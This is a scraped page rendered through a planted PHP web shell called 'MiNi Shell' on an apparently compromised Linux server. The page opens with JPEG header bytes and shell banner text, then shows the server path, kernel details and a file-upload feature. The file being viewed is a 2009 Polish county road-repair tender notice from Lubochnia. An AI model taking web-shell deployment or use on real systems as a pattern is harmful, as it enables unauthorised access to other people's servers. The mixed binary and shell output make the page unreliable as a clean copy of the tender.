JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090206/20262-N-2009.html

<p class="kh_header"><b>Lubochnia: Remont ciągu dróg powiatowych Inowłódz - Konewka - (Spała) - Lubochnia - Ujazd.  
I etap na odcinku drogi od miejscowości Olszowiec o długości 8,1 km</b><br>
<b>Numer ogłoszenia: 20262 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Tomaszowie Mazowieckim z/s w Jakubowie , 97-217 Lubochnia, woj. łódzkie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat-tomaszowski.pl   Zakładka:Jednostki Samorządowe=>Wykaz jednostek=> Zarząd Dróg</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ciągu dróg powiatowych Inowłódz - Konewka - (Spała) - Lubochnia - Ujazd.  
I etap na odcinku drogi od miejscowości Olszowiec o długości 8,1 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących robót i działań:

1.	Roboty przygotowawcze i rozbiórkowe
2.	Frezowanie nawierzchni
3.	Roboty ziemne (pogłębienie rowów)
4.	Odtworzenie zjazdów
5.	Roboty nawierzchniowe
6.	Regulacja i utwardzenie poboczy
7.	Oznakowanie pionowe
8.	Oznakowanie poziome
9.	Urządzenia bezpieczeństwa ruchu
10.	Roboty wykończeniowe i uzupełniające
11.	Wykonanie geodezyjnej inwentaryzacji powykonawczej

Szczegółowy zakres robót (przedmiar robót) zawiera załącznik nr 7 do niniejszej instrukcji, zgodnie z posiadaną przez zamawiającego dokumentacją projektowo - kosztorysową..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8, 45.23.24.52-5, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. W niniejszym postępowaniu o udzielenie zamówienia publicznego przewiduje się wniesienie przez wykonawców wadium w wysokości 50 000 zł przed upływem terminu składania ofert.

2. Wadium może być wnoszone w jednej lub kilku następujących formach:
-	pieniądzu na konto zamawiającego PKO B.P. SA o/Tomaszów Maz nr 71 1020 3916 0000 0702 0106 9301 z dopiskiem: I etap - Olszowiec
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (w tym przypadku - wyłącznie jako pieniężne)
-	gwarancjach bankowych
-	gwarancjach ubezpieczeniowych
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3. Zamawiający zwróci niezwłocznie wadium, jeżeli:
a)	upłynie termin związania ofertą
b)	zostanie zawarta umowa w sprawie zamówienia publicznego i wniesione zostanie zabezpieczenie należytego wykonania umowy
c)	zamawiający unieważni postępowanie o udzielenie zamówienia, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia.

4.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca którego oferta zostanie wybrana:

a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy
c)	jeśli zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy mający prawo występowania    w obrocie prawnym, zgodnie z wymogami ustawowymi, oraz spełniający niżej podane warunki:
1.	Wykonawca składający ofertę nie może być wykluczony z postępowania na podst. art. 24 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku (tekst jedn. Dz. U. Nr 223 poz. 1655 z 2007 r. z późn. zm.)
2.	Wykonawca musi wykazać, że posiada potencjał kadrowy odpowiedni pod względem kwalifikacji:
a)	kierownik budowy - osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami budowlanymi na stanowisku kierownika budowy przy realizacji robót drogowych - co najmniej 6 lat, uprawnienia budowlane w specjalności drogowej bez ograniczeń do kierowania robotami budowlanymi;
b)	majster dla robót w specjalności drogowej - osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami budowlanymi na stanowisku kierownika budowy lub kierownika robót przy realizacji robót drogowych - co najmniej 3 lata, uprawnienia budowlane w specjalności drogowej bez ograniczeń do kierowania robotami budowlanymi;

Ponadto dla powyższych osób wykonawca zobowiązany jest przedłożyć kopie aktualnych zaświadczeń o ich przynależności do właściwej Izby Inżynierów Budownictwa oraz kopie uprawnień budowlanych
3.	Wykonawca musi wykazać, że posiada w dyspozycji następujący potencjał sprzętowy zgodnie z pkt. IV.3 Specyfikacji Istotnych Warunków Zamówienia.
4.	Wykonawca musi udokumentować, że posiada doświadczenie w wykonywaniu zamówień o podobnym charakterze i złożoności tj. zrealizowanie w okresie ubiegłych  5 lat od daty składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zadania polegającego na realizacji przebudowy lub remontu drogi publicznej, w ramach którego wykonano warstwy nawierzchni z betonu asfaltowego o powierzchni nie mniejszej niż 25.000 m2 z podaniem jego wartości oraz daty i miejsca wykonania. Wykonawca zobowiązany jest dołączyć do oferty referencje, wystawione przez zamawiających - zarządców (zarządy) dróg, potwierdzające że powyższe roboty zostały wykonane należycie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca dołączy do oferty (stanowiącej załącznik nr 1) następujące dokumenty poświadczające oraz informacje:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, dopuszczające wykonawcę do obrotu prawnego                 w zakresie objętym zamówieniem), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiednio, że wykonawca nie zalega                 z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed terminem składania ofert.
3.	Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia, wraz                   z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, oraz zakresu wykonywanych przez nich czynności (poświadczone kopie uprawnień osób przewidzianych do kierowania robotami), zgodnie z pkt. IV.2. SIWZ Zaleca się sporządzenie wykazu na formularzu stanowiącym załącznik nr 3 do SIWZ.
4.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca, z udokumentowaniem ich posiadania (umowy najmu, dzierżawy), zgodnie z pkt. IV.3.SIWZ Zaleca się sporządzenie wykazu na formularzu stanowiącym załącznik nr 4 do SIWZ. 
5.	Wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia robót budowlanych, odpowiadających swoim rodzajem robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, roku wykonania i zamawiających, zgodnie z pkt. IV.4. SIWZ. Zaleca się sporządzenie wykazu na formularzu stanowiącym załącznik nr 5 do SIWZ.
6.	Oświadczenie zgodne z art. 22 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku (tekst jedn. Dz. U. Nr 223 poz. 1655 z 2007 r. z późn. zm.) stanowiące załącznik nr 6 do SIWZ.
7.	Wypełniony formularz kosztorysu ofertowego stanowiący załącznik nr 2 do niniejszej SIWZ.
8.	Kopię dokumentu potwierdzającego zawarcie ubezpieczenia od odpowiedzialności cywilnej na cały okres trwania realizacji zamówienia.
9.	Potwierdzenie wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-tomaszowski.pl  ! Zakładka:Jednostki samorządowe=>Wykaz jednostek=>Zarząd Dróg....<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Tomaszowie Mazowieckim, Jakubów 19/21, 97-217 Lubochnia , pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Tomaszowie Mazowieckim, Jakubów 19/21, 97-217 Lubochnia , pokój nr 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Roboty zostaną wykonane w ramach:Narodowego Programu Przebudowy Dróg Lokalnych 2008 - 2011.5.	Wykonawca udzieli zamawiającemu 4 lat gwarancji na wykonany przedmiot zamówienia. Bieg okresu gwarancyjnego rozpoczyna się w dniu dokonania odbioru końcowego.
2.	Wykonawca powinien uwzględnić w cenie ofertowej koszty zaprojektowania, uzgodnienia, wdrożenia i utrzymania tymczasowej organizacji ruchu na czas prowadzenia robót oraz koszty wykonania i ustawienia 2 tablic informacyjnych dotyczących przedmiotu zamówienia.
3.	Wykonawca w ramach zawartej umowy poinformuje społeczeństwo o zamiarze wprowadzenia tymczasowej organizacji ruchu w drodze ogłoszenia prasowego w prasie lokalnej.

Creat By MiNi SheLL
Email: jattceo@gmail.com